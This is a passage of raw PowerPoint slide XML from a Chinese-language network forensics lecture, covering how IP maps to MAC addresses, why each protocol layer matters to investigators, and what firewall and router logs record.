            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1388264"/>
            <a:ext cx="6840760" cy="1600438"/>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对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，每一帧还包含一个类型值（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x0800</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x0806</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），指明帧的载荷包含的协议，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还是地址解析协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议时，每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址映射到一个特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。因为多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址能映射到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，所以一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址不必要唯一地确定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证中层的重要性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1065098"/>
            <a:ext cx="6840760" cy="2246769"/>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四层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议簇中的每一层都包含重要的信息，硬件层提供物理组件的信息，其它的层描述逻辑信息。对于网络中的事件，取证人员可以映射一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层的逻辑标识符）到一个特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址（物理层的物理标识符），从而发现值得注意的主机。结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层域）和端口号（传输层域），取证人员可以知道哪一个应用程序被使用或者是目标，然后通过检查应用层数据加以确认。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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6.2.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证中层的重要性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1131590"/>
            <a:ext cx="6840760" cy="3216265"/>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网络取证分析依赖所有层。当取证人员分析数据的时候，通常只有有限的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>—IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址、协议或者端口信息，然而，这些有限的信息足够用来帮助搜索更多的其它信息。多数情况下，应用层包含了真实的活动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>----</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>很多攻击针对的是应用程序和服务的漏洞，而且很多误用是应用程序的误用。取证人员需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，以便查明涉及到某种网络活动的主机，而这个主机可能包含更多的信息。一些网络攻击活动与应用级数据无关（例如分布式拒绝服务攻击），但绝大多数有关。网络取证同样为应用级活动的调查取证提供重要支持。</a:t>
            </a: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608877" y="1337721"/>
            <a:ext cx="2055371" cy="156966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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.3</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3664248" y="2114659"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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网络取证数据源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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4"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6.3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>防火墙和路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="563802"/>
            <a:ext cx="6840760" cy="3308598"/>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基于网络的防火墙和路由器以及基于主机的个人防火墙，根据一系列的规则来检查网络数据通信，并允许或者拒绝其通过。通常防火墙和路由器配置为将基本信息或者所有被拒绝的连接尝试以及无连接的数据记入日志，而有些则记录所有的数据包。日志内容包括数据包被处理的日期和时间、源和目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址、传输层协议（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等）、以及基本的协议信息（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的端口号，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的类型和代码），数据包的内容通常不做记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    下图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示了典型的路由器日志。</a:t>
            </a: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endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71682" name="Picture 2" descr="cisco-pix_log"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547664" y="3075806"/>
            <a:ext cx="5715000" cy="40957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6.3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>防火墙和路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="813361"/>
            <a:ext cx="6840760" cy="2200602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
